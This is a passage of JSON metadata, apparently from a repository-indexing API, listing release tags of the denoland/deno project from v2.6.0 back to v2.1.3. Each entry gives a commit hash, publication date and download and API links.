positories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880